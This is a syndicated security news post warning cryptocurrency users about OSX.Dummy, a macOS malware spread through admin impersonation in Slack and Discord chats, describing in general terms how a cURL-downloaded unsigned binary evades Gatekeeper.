Crypto Investors on Slack and Discord: Beware the OSX.Dummy Malware

Security researchers recently found out how attackers are using macOS malware known as OSX.Dummy to target cryptocurrency investors using the Slack and Discord chat platforms. The chat platforms are abused by cybercriminals who are impersonating admins to trick users.

The way the malware is distributing isn’t that sophisticated but compromised systems remain at risk of remote code execution which may lead to various malicious outcomes. According to Digita Security, upon a successful connection to the attackers’ command and control servers, they are able to arbitrarily execute command on infected hosts at the root level.

OSX.Dummy, Slack and Discord Chat Platforms – How Attacks Happen

The first researcher to pick up the OSX.Dummy malware was Remco Verhoef who shared his discovery with the SANS Infosec Handlers Diary Blog. This is what he said:

Over the previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are shared, resulting in downloading and executing a malicious binary.

Users are tricked to execute a script which then downloads OSX.Dummy malware using cURL. The downloaded file is saved to the macOS/tmp/script directory and is then executed. “The file is a large mach064 binary (34M), rating a perfect score of 0/60 on VirusTotal,” the researcher said. The binary of the malware is unsigned and is obviously able to bypass macOS Gatekeeper which should prevent unsigned software from being downloaded and executed.

How is that possible? If the user is downloading and running a binary using terminal commands, Gatekeeper isn’t activated and the unsigned binary is executed without a problem. This simply means that the built-in protections and mitigations of macOS are not sufficient (Read more...)

*** This is a Security Bloggers Network syndicated blog from How to, Technology and PC Security Forum authored by Milena Dimitrova. Read the original post at: